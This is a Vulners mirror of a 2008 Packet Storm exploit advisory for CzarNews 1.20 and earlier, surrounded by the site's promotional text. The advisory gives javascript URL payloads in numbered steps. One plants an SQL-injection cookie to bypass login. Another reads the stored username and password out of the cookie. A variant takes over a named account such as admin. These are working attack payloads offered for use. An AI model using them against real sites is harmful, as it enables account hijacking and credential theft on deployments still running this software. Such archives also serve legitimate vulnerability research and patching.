Lucene search

czarnewsaccount-sql.txt

🗓️ 15 Sep 2008 00:00:00Reported by OutOfBoundType

packetstorm🔗 packetstormsecurity.com👁 19 Views

CzarNews Account Hijacking exploit, author Maycon Maia Vitali, Original Xploit by StAkeR, steps to exploit, targeting specific use

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

`czarNews Account Hijacking <= 1.20 user and password Leak  
----------------------------------------------------------  
  
Author: Maycon Maia Vitali ( 0ut0fBound )  
Contact: mayconmaia at yahoo dot com dot br  
http://maycon.gsec.com.br  
  
Original Xploit by StAkeR ( http://www.milw0rm.com/exploits/6462 )  
  
  
Gerenal Xploit:  
---------------  
  
1) Go to some page with CzarNews 1.20. You are in the 'Login Page'  
2) Put in the URL: javascript:document.cookie="recook=' or ''=',' or  
''='";void(0);  
3) Refresh the page. Now you are logged in.  
4) Put in the URL:  
javascript:c=document.cookie;p=c.substr(c.lastIndexOf('=')+1).split(/%../);a  
lert("Login: " + p[0] + "\nPass: " + p[1]);void(0);  
5) With this you getted the current user and password  
  
Attacking Especific User:  
-------------------------  
  
If you have some user that you need Xploit, You can change the step 2 by  
this:  
  
2) Put in the URL:  
javascript:document.cookie="recook=[USER],'+or+''='";void(0);  
  
Where [USER] need to be replaced with user name (e.g. admin)  
  
  
enjoy,  
0ut0fBound  
  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

15 Sep 2008 00:00Current

7.4High risk

Vulners AI Score7.4